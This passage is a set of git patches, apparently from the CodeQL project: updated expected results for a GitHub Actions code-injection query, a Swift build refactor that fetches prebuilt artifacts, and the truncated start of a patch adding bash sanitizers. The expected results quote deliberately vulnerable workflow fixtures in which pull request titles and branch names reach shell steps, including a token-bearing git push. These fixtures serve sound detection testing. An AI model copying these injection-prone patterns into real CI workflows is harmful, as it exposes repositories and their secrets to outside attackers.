workflow_run | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index ddfa951241e..be14d58737e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -13,8 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | @@ -234,10 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | From d3fb2543d2977c57ab6e4ab32279db6ce904ba26 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 12:26:34 +0100 Subject: [PATCH 0651/1267] Swift: try out new builds --- .gitattributes | 3 +- .github/workflows/swift.yml | 6 + MODULE.bazel | 19 +- misc/bazel/lfs.bzl | 6 + swift/BUILD.bazel | 2 +- swift/actions/build-and-test/action.yml | 2 +- swift/extractor/BUILD.bazel | 2 +- swift/extractor/infra/BUILD.bazel | 2 +- swift/extractor/main.cpp | 1 + swift/extractor/mangler/BUILD.bazel | 2 +- swift/extractor/remapping/BUILD.bazel | 2 +- swift/extractor/translators/BUILD.bazel | 2 +- swift/third_party/BUILD.bazel | 3 + .../BUILD.swift-llvm-support.bazel | 20 +- swift/third_party/load.bzl | 178 +++++++----------- swift/third_party/resource-dir/BUILD.bazel | 27 --- swift/third_party/resource-dir/README.md | 2 - swift/third_party/resources/BUILD.bazel | 21 +++ .../{resource-dir => resources}/LICENSE.txt | 0 swift/third_party/resources/README.md | 7 + .../resource-dir-linux.zip | 0 .../resource-dir-macos.zip | 0 .../{resource-dir => resources}/update.sh | 0 .../swift-llvm-support/BUILD.bazel | 9 - 24 files changed, 147 insertions(+), 169 deletions(-) delete mode 100644 swift/third_party/resource-dir/BUILD.bazel delete mode 100644 swift/third_party/resource-dir/README.md create mode 100644 swift/third_party/resources/BUILD.bazel rename swift/third_party/{resource-dir => resources}/LICENSE.txt (100%) create mode 100644 swift/third_party/resources/README.md rename swift/third_party/{resource-dir => resources}/resource-dir-linux.zip (100%) rename swift/third_party/{resource-dir => resources}/resource-dir-macos.zip (100%) rename swift/third_party/{resource-dir => resources}/update.sh (100%) delete mode 100644 swift/third_party/swift-llvm-support/BUILD.bazel diff --git a/.gitattributes b/.gitattributes index 215fe0b81e1..df5bed028be 100644 --- a/.gitattributes +++ b/.gitattributes @@ -86,4 +86,5 @@ /misc/ripunzip/ripunzip-* filter=lfs diff=lfs merge=lfs -text # swift prebuilt resources -/swift/third_party/resource-dir/*.zip filter=lfs diff=lfs merge=lfs -text +/swift/third_party/resources/*.zip filter=lfs diff=lfs merge=lfs -text +/swift/third_party/resources/*.tar.zst filter=lfs diff=lfs merge=lfs -text diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index ad7e8f52aa3..6056dc4363f 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -109,3 +109,9 @@ jobs: - uses: actions/checkout@v4 - uses: ./.github/actions/fetch-codeql - uses: ./swift/actions/database-upgrade-scripts + check-no-override: + if : ${{ github.event_name == 'pull_request' }} + runs-on: ubuntu-latest + steps: + - shell: bash + run: bazel test //swift/... --test_tag_filters=override --test_output=errors diff --git a/MODULE.bazel b/MODULE.bazel index 4a2219d43a5..b4f209dae7c 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -28,6 +28,7 @@ bazel_dep(name = "gazelle", version = "0.38.0") bazel_dep(name = "rules_dotnet", version = "0.15.1") bazel_dep(name = "googletest", version = "1.14.0.bcr.1") bazel_dep(name = "rules_rust", version = "0.50.0") +bazel_dep(name = "zstd", version = "1.5.5.bcr.1") bazel_dep(name = "buildifier_prebuilt", version = "6.4.0", dev_dependency = True) @@ -91,10 +92,10 @@ use_repo( swift_deps, "binlog", "picosha2", - "swift_prebuilt_darwin_x86_64", - "swift_prebuilt_linux", - "swift_toolchain_linux", - "swift_toolchain_macos", + "swift-prebuilt-linux", + "swift-prebuilt-macos", + "swift-resource-dir-linux", + "swift-resource-dir-macos", ) node = use_extension("@rules_nodejs//nodejs:extensions.bzl", "node") @@ -186,16 +187,6 @@ lfs_files( executable = True, ) -lfs_files( - name = "swift-resource-dir-linux", - srcs = ["//swift/third_party/resource-dir:resource-dir-linux.zip"], -) - -lfs_files( - name = "swift-resource-dir-macos", - srcs = ["//swift/third_party/resource-dir:resource-dir-macos.zip"], -) - register_toolchains( "@nodejs_toolchains//:all", ) diff --git a/misc/bazel/lfs.bzl b/misc/bazel/lfs.bzl index a068d76b2ea..5dcba3894a3 100644 --- a/misc/bazel/lfs.bzl +++ b/misc/bazel/lfs.bzl @@ -77,6 +77,12 @@ def _download_lfs(repository_ctx): ) repository_ctx.file("BUILD.bazel", build) + # this is for drop-in compatibility with `http_file` + repository_ctx.file( + "file/BUILD.bazel", + 'alias(name = "file", actual = "//:%s", visibility = ["//visibility:public"])\n' % name, + ) + lfs_archive = repository_rule( doc = "Export the contents from an on-demand LFS archive. The corresponding path should be added to be ignored " + "in `.lfsconfig`.", diff --git a/swift/BUILD.bazel b/swift/BUILD.bazel index 444730950be..52509a0963c 100644 --- a/swift/BUILD.bazel +++ b/swift/BUILD.bazel @@ -81,7 +81,7 @@ codeql_pack( zips = select({ "@platforms//os:windows": {}, "//conditions:default": { - "//swift/third_party/resource-dir": "resource-dir/{CODEQL_PLATFORM}", + "//swift/third_party/resources:dir": "resource-dir/{CODEQL_PLATFORM}", }, }), ) diff --git a/swift/actions/build-and-test/action.yml b/swift/actions/build-and-test/action.yml index 2522f545c05..9cbae47bacc 100644 --- a/swift/actions/build-and-test/action.yml +++ b/swift/actions/build-and-test/action.yml @@ -58,7 +58,7 @@ runs: if: ${{ github.event_name == 'pull_request' }} shell: bash run: | - bazel test //swift/... + bazel test //swift/... --test_tag_filters=-override --test_output=errors - name: Evict bazel cache if: ${{ github.event_name != 'pull_request' }} shell: bash diff --git a/swift/extractor/BUILD.bazel b/swift/extractor/BUILD.bazel index 8290aec4121..962392a6c57 100644 --- a/swift/extractor/BUILD.bazel +++ b/swift/extractor/BUILD.bazel @@ -18,7 +18,7 @@ swift_cc_binary( "//swift/extractor/invocation", "//swift/extractor/remapping", "//swift/extractor/translators", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", "@absl//absl/strings", ], ) diff --git a/swift/extractor/infra/BUILD.bazel b/swift/extractor/infra/BUILD.bazel index 6a624844c76..7f6af092ef4 100644 --- a/swift/extractor/infra/BUILD.bazel +++ b/swift/extractor/infra/BUILD.bazel @@ -10,7 +10,7 @@ swift_cc_library( "//swift/extractor/infra/file", "//swift/extractor/trap", "//swift/logging", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", "@picosha2", ], ) diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index ad2939bb5e2..045d7fdb968 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -20,6 +20,7 @@ #include "swift/extractor/trap/TrapDomain.h" #include "swift/extractor/infra/file/Path.h" #include "swift/logging/SwiftAssert.h" +#include "swift/Threading/Errors.h" using namespace std::string_literals; using namespace codeql::main_logger; diff --git a/swift/extractor/mangler/BUILD.bazel b/swift/extractor/mangler/BUILD.bazel index 71c9cbf900e..658e750bdcc 100644 --- a/swift/extractor/mangler/BUILD.bazel +++ b/swift/extractor/mangler/BUILD.bazel @@ -8,6 +8,6 @@ swift_cc_library( deps = [ "//swift/extractor/infra", "//swift/extractor/trap", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", ], ) diff --git a/swift/extractor/remapping/BUILD.bazel b/swift/extractor/remapping/BUILD.bazel index da5eee55dc1..44a7d7445bb 100644 --- a/swift/extractor/remapping/BUILD.bazel +++ b/swift/extractor/remapping/BUILD.bazel @@ -8,7 +8,7 @@ swift_cc_library( deps = [ "//swift/extractor/config", "//swift/extractor/infra/file", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", "@picosha2", ], ) diff --git a/swift/extractor/translators/BUILD.bazel b/swift/extractor/translators/BUILD.bazel index 0bfc59db970..7b3356f6960 100644 --- a/swift/extractor/translators/BUILD.bazel +++ b/swift/extractor/translators/BUILD.bazel @@ -8,6 +8,6 @@ swift_cc_library( deps = [ "//swift/extractor/infra", "//swift/extractor/mangler", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", ], ) diff --git a/swift/third_party/BUILD.bazel b/swift/third_party/BUILD.bazel index e69de29bb2d..b9982c37e8d 100644 --- a/swift/third_party/BUILD.bazel +++ b/swift/third_party/BUILD.bazel @@ -0,0 +1,3 @@ +load(":load.bzl", "test_no_override") + +test_no_override() diff --git a/swift/third_party/BUILD.swift-llvm-support.bazel b/swift/third_party/BUILD.swift-llvm-support.bazel index af98184b673..231500b35ab 100644 --- a/swift/third_party/BUILD.swift-llvm-support.bazel +++ b/swift/third_party/BUILD.swift-llvm-support.bazel @@ -1,12 +1,9 @@ cc_library( - name = "swift-llvm-support", + name = "swift-llvm-support-static", srcs = glob( [ "*.a", - "*.so", - "*.dylib", ], - allow_empty = True, # Either *.so or *.dylib will be empty ), hdrs = glob([ "include/**/*", @@ -16,6 +13,20 @@ cc_library( "include", "stdlib/public/SwiftShims", ], + deps = [ + "@zstd", + ], +) + +cc_library( + name = "swift-llvm-support", + srcs = glob( + [ + "*.so", + "*.dylib", + ], + allow_empty = True, # Either *.so or *.dylib will be empty + ), linkopts = [ "-lm", "-lz", @@ -32,4 +43,5 @@ cc_library( "//conditions:default": [], }), visibility = ["//visibility:public"], + deps = [":swift-llvm-support-static"], ) diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index a893b59d2dc..75eb585b6cc 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -1,101 +1,55 @@ -load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") +load("@bazel_skylib//rules:write_file.bzl", "write_file") +load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive", "http_file") load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe") +load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") -_swift_prebuilt_version = "swift-6.0.1-RELEASE.330" -_swift_sha_map = { - "Linux-X64": "3da9b257b08da3bed023656c3bea2e1d0e6504b1592f593a077023c59e5339fc", - "macOS-X64": "66641b3b285e593342b88d48defa6668b15a85603acfe5aba5b62b9ed9123465", +# these are used to test new artifacts. They must not be merged to main as different from None +_override_resource_dir = { + "macOS": "ad533e614c3565db17186fa93684bd404d1bd66120b563957a44afc997a82b5e", + "Linux": "d6f1abbe9c0662ec2418b9a8c0136b1d8399601f556631a7b0910115cef3a38a", +} +_override_prebuilt = { + "macOS": "8f3c775aa7a62e97046f4dcfbc5b51c317712250396c7a07f7d0f4bd666a59d4", + "Linux": "5658fe92fe60b01b897757495d455c9fe435037a0973cb5b642e04be00a77ed3", } -_swift_arch_map = { - "Linux-X64": "linux", - "macOS-X64": "darwin_x86_64", -} +_staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{file}/{file}" -_swift_version = _swift_prebuilt_version.rpartition(".")[0] - -_toolchain_info = { - "linux": struct( - platform = "ubuntu2004", - suffix = "ubuntu20.04", - extension = "tar.gz", - sha = "935d0b68757d9b1aceb6410fe0b126a28a07e362553ebba0c4bcd1c9a55d0bc5", - ), - "macos": struct( - platform = "xcode", - suffix = "osx", - extension = "pkg", - sha = "ef9bb6b38711324e1b1c89de44a27d9519d0711924c57f4df541734b04aaf6cc", - ), -} - -def _get_toolchain_url(info): - return "https://download.swift.org/%s/%s/%s/%s-%s.%s" % ( - _swift_version.lower(), - info.platform, - _swift_version, - _swift_version, - info.suffix, - info.extension, - ) - -def _toolchains(): - rules = { - "tar.gz": http_archive, - "pkg": _pkg_archive, - } - for arch, info in _toolchain_info.items(): - rule = rules[info.extension] - rule( - name = "swift_toolchain_%s" % arch, - url = _get_toolchain_url(info), - sha256 = info.sha, - build_file = _build % "swift-toolchain-%s" % arch, - strip_prefix = "%s-%s" % (_swift_version, info.suffix), +def _load_resource_dir(plat): + name = "swift-resource-dir-%s" % plat.lower() + file = "resource-dir-%s.zip" % plat + override = _override_resource_dir[plat] + if override: + http_file( + name = name, + url = _staging_url.format(file = file), + sha256 = override, + downloaded_file_path = file, + ) + else: + lfs_files( + name = name, + srcs = ["//swift/third_party/resources:%s" % file], ) -def _run(repository_ctx, message, cmd, working_directory = "."): - repository_ctx.report_progress(message) - res = repository_ctx.execute( - ["bash", "-c", cmd], - working_directory = working_directory, - ) - if res.return_code != 0: - fail(message) - -def _pkg_archive_impl(repository_ctx): - archive = "file.pkg" - url = repository_ctx.attr.url - dir = "%s-package.pkg" % repository_ctx.attr.strip_prefix - repository_ctx.report_progress("downloading %s" % url) - res = repository_ctx.download( - url, - output = archive, - sha256 = repository_ctx.attr.sha256, - ) - if not repository_ctx.attr.sha256: - print("Rule '%s' indicated that a canonical reproducible form " % repository_ctx.name + - "can be obtained by modifying arguments sha256 = \"%s\"" % res.sha256) - _run(repository_ctx, "extracting %s" % dir, "xar -xf %s" % archive) - repository_ctx.delete(archive) - _run( - repository_ctx, - "extracting Payload from %s" % dir, - "cat %s/Payload | gunzip -dc | cpio -i" % dir, - ) - repository_ctx.delete(dir) - repository_ctx.symlink(repository_ctx.attr.build_file, "BUILD") - repository_ctx.file("WORKSPACE") - -_pkg_archive = repository_rule( - implementation = _pkg_archive_impl, - attrs = { - "url": attr.string(mandatory = True), - "sha256": attr.string(), - "strip_prefix": attr.string(), - "build_file": attr.label(mandatory = True), - }, -) +def _load_prebuilt(plat): + name = "swift-prebuilt-%s" % plat.lower() + file = "swift-prebuilt-%s.tar.zst" % plat + build = _build % "swift-llvm-support" + override = _override_prebuilt[plat] + if override: + http_archive( + name = name, + url = _staging_url.format(file = file), + sha256 = override, + build_file = build, + ) + else: + lfs_archive( + name = name, + src = "//swift/third_party/resources:%s" % file, + build_file = build, + ) def _github_archive(*, name, repository, commit, build_file = None, sha256 = None): github_name = repository[repository.index("/") + 1:] @@ -111,20 +65,9 @@ def _github_archive(*, name, repository, commit, build_file = None, sha256 = Non _build = "//swift/third_party:BUILD.%s.bazel" def load_dependencies(module_ctx): - for repo_arch, arch in _swift_arch_map.items(): - sha256 = _swift_sha_map[repo_arch] - - http_archive( - name = "swift_prebuilt_%s" % arch, - url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/%s/swift-prebuilt-%s.zip" % ( - _swift_prebuilt_version, - repo_arch, - ), - build_file = _build % "swift-llvm-support", - sha256 = sha256, - ) - - _toolchains() + for plat in ("macOS", "Linux"): + _load_prebuilt(plat) + _load_resource_dir(plat) _github_archive( name = "picosha2", @@ -148,3 +91,28 @@ def load_dependencies(module_ctx): ) swift_deps = module_extension(load_dependencies) + +def test_no_override(): + test_body = ["#!/bin/bash", "", "RET=0"] + for name, definition in ( + ("_override_prebuilt", _override_prebuilt), + ("_override_resource_dir", _override_resource_dir), + ): + for plat in ("macOS", "Linux"): + if definition[plat]: + test_body += [ + 'echo %s[\\"%s\\"] overridden in swift/third/party/load.bzl' % (name, plat), + "RET=1", + ] + test_body += ["", "exit $RET"] + write_file( + name = "test-no-override-gen", + out = "test-no-override.sh", + content = test_body, + is_executable = True, + ) + native.sh_test( + name = "test-no-override", + srcs = [":test-no-override-gen"], + tags = ["override"], + ) diff --git a/swift/third_party/resource-dir/BUILD.bazel b/swift/third_party/resource-dir/BUILD.bazel deleted file mode 100644 index 9cea2efd029..00000000000 --- a/swift/third_party/resource-dir/BUILD.bazel +++ /dev/null @@ -1,27 +0,0 @@ -alias( - name = "resource-dir", - actual = select({"@platforms//os:" + os: "@swift-resource-dir-" + os for os in ("linux", "macos")}), - target_compatible_with = select({ - "@platforms//os:windows": ["@platforms//:incompatible"], - "//conditions:default": [], - }), - visibility = ["//visibility:public"], -) - -[ - sh_binary( - name = "update-" + os, - srcs = ["update.sh"], - args = [ - "$(rlocationpath @swift_toolchain_%s)" % os, - "$(rlocationpath resource-dir-%s.zip)" % os, - ], - data = [ - "resource-dir-%s.zip" % os, - "@swift_toolchain_" + os, - ], - target_compatible_with = ["@platforms//os:" + os], - deps = ["//misc/bazel:sh_runfiles"], - ) - for os in ("linux", "macos") -] diff --git a/swift/third_party/resource-dir/README.md b/swift/third_party/resource-dir/README.md deleted file mode 100644 index 38873b4a54f..00000000000 --- a/swift/third_party/resource-dir/README.md +++ /dev/null @@ -1,2 +0,0 @@ -These LFS files are redistributed parts of the [Swift toolchains](https://www.swift.org/download/). -A [copy](./LICENSE.txt) of the [swift](https://github.com/apple/swift) license is included. diff --git a/swift/third_party/resources/BUILD.bazel b/swift/third_party/resources/BUILD.bazel new file mode 100644 index 00000000000..3bf263911cd --- /dev/null +++ b/swift/third_party/resources/BUILD.bazel @@ -0,0 +1,21 @@ +_oses = ("linux", "macos") + +alias( + name = "dir", + actual = select({"@platforms//os:" + os: "@swift-resource-dir-%s//file" % os for os in _oses}), + target_compatible_with = select({ + "@platforms//os:windows": ["@platforms//:incompatible"], + "//conditions:default": [], + }), + visibility = ["//visibility:public"], +) + +alias( + name = "prebuilt", + actual = select({"@platforms//os:" + os: "@swift-prebuilt-%s//:swift-llvm-support" % os for os in _oses}), + target_compatible_with = select({ + "@platforms//os:windows": ["@platforms//:incompatible"], + "//conditions:default": [], + }), + visibility = ["//visibility:public"], +) diff --git a/swift/third_party/resource-dir/LICENSE.txt b/swift/third_party/resources/LICENSE.txt similarity index 100% rename from swift/third_party/resource-dir/LICENSE.txt rename to swift/third_party/resources/LICENSE.txt diff --git a/swift/third_party/resources/README.md b/swift/third_party/resources/README.md new file mode 100644 index 00000000000..99b48964e19 --- /dev/null +++ b/swift/third_party/resources/README.md @@ -0,0 +1,7 @@ +The `resource-dir-*.zip` LFS files are redistributed parts of the [Swift toolchains](https://www.swift.org/download/). + +The `swift-prebuilt-*.tar.zst` LFS files are precompiled binaries of the [swift code][swift]. + +A [copy](./LICENSE.txt) of the [swift][] license is included. + +[swift]: https://github.com/apple/swift diff --git a/swift/third_party/resource-dir/resource-dir-linux.zip b/swift/third_party/resources/resource-dir-linux.zip similarity index 100% rename from swift/third_party/resource-dir/resource-dir-linux.zip rename to swift/third_party/resources/resource-dir-linux.zip diff --git a/swift/third_party/resource-dir/resource-dir-macos.zip b/swift/third_party/resources/resource-dir-macos.zip similarity index 100% rename from swift/third_party/resource-dir/resource-dir-macos.zip rename to swift/third_party/resources/resource-dir-macos.zip diff --git a/swift/third_party/resource-dir/update.sh b/swift/third_party/resources/update.sh similarity index 100% rename from swift/third_party/resource-dir/update.sh rename to swift/third_party/resources/update.sh diff --git a/swift/third_party/swift-llvm-support/BUILD.bazel b/swift/third_party/swift-llvm-support/BUILD.bazel deleted file mode 100644 index 4bc1fffba94..00000000000 --- a/swift/third_party/swift-llvm-support/BUILD.bazel +++ /dev/null @@ -1,9 +0,0 @@ -package(default_visibility = ["//swift:__subpackages__"]) - -alias( - name = "swift-llvm-support", - actual = select({ - "@bazel_tools//src/conditions:linux": "@swift_prebuilt_linux//:swift-llvm-support", - "@bazel_tools//src/conditions:darwin": "@swift_prebuilt_darwin_x86_64//:swift-llvm-support", - }), -) From 263582c7969ede1c3d8a1022756434fe0d1054bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 12:43:19 +0100 Subject: [PATCH 0652/1267] feat: Add sanitizers for bash test commands --- ql/lib/codeql/actions/Bash.qll | 23 ++++++- .../CWE-094/.github/workflows/test23.yml | 64 +++++++++++++++++++ 2 files changed, 86 insertions(+), 1 deletion(-) create mode 100644 